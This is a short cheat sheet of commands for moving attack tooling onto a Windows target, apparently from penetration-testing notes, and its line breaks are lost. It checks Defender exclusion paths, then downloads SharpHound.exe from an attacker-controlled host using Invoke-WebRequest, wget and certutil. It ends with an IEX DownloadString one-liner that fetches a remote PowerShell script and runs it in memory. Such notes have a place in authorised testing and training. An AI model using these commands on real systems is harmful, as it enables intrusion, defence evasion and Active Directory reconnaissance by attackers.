File Transfer
Get-MpPreference | Select-Object -ExpandProperty ExclusionPathInvoke-WebRequest -Uri http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exewget http://172.16.99.145:8000/SharpHound.exe -O .\SharpHound.execertutil -urlcache -f -split http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exeIEX(New-Object Net.WebClient).downloadString('http://tun0-ip:port/filename.ps1') Last updated